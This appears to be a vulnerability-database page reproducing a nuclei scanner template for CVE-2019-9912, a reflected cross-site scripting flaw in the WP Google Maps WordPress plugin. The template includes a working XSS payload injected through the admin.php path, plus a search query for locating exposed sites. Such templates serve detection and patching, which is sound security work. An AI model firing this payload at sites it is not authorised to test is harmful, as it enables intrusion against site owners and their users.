Lucene search

K

WP Google Maps < 7.10.43 - Cross-Site Scripting

🗓️ 14 Dec 2024 05:08:39Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

WP Google Maps plugin prior to version 7.10.43 has medium severity XSS vulnerability.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
WPVulnDB
WP Google Maps <= 7.10.41 - Cross-Site Scripting (XSS)
5 Feb 201900:00
wpvulndb
Prion
Design/Logic Flaw
22 Mar 201900:29
prion
NVD
CVE-2019-9912
22 Mar 201900:29
nvd
OpenVAS
WordPress Google Maps Plugin < 7.10.43 XSS Vulnerability
28 Mar 201900:00
openvas
Cvelist
CVE-2019-9912
21 Mar 201923:01
cvelist
Patchstack
WordPress WP Google Maps plugin <= 7.10.41 - Cross-Site Scripting (XSS) vulnerability
22 Mar 201900:00
patchstack
CVE
CVE-2019-9912
22 Mar 201900:29
cve
id: CVE-2019-9912

info:
  name: WP Google Maps < 7.10.43 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The wp-google-maps plugin before 7.10.43 for WordPress has XSS via the wp-admin/admin.php PATH_INFO.
  reference:
    - https://lists.openwall.net/full-disclosure/2019/02/05/13
    - https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9912
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-9912
    cwe-id: CWE-79
    cpe: cpe:2.3:a:wpgmaps:wp_go_maps:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/wp-google-maps"
    vendor: codecabin
    product: wp_go_maps
  tags: cve,cve2019,wp,wp-plugin,wordpress,xss,wp-go-maps

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "/wp-content/plugins/wp-google-maps"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin.php/'\"><img src=x onerror=alert(document.domain)>?page=wp-google-maps-menu&action=foo"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "><img src=x onerror=alert(document.domain)>"

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c4ff5cc79ee9d0dd3211eeec63a606b6777ab553a1d290ca7295173fbe216988022100be72055fda9e9f21ea7e54c037a9f9af2b35ecbe7eed7a79f80d52aab7329ed6:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
14 Dec 2024 05:39Current
5.9Medium risk
Vulners AI Score5.9
CVSS24.3
CVSS36.1
EPSS0.007
3
.json
Report